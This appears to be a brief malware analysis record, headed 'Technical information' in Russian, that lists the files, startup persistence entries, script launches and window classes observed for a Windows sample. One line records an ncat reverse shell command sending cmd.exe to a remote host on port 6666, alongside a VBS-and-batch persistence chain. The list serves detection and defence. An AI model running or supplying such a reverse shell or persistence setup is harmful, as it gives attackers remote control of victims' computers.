Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\silentstart.vbs.lnk
- 'C:\ProgramData\ncat.exe' -e cmd.exe [IP] 6666
- '<SYSTEM32>\cmd.exe' /c ""C:\ProgramData\start.bat" "
- '<SYSTEM32>\wscript.exe' launcher.vbs start.bat
- '<SYSTEM32>\wscript.exe' "C:\ProgramData\silentstart.vbs"
- C:\ProgramData\silentstart.vbs
- C:\ProgramData\start.bat
- C:\ProgramData\launcher.vbs
- C:\ProgramData\ncat.exe
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'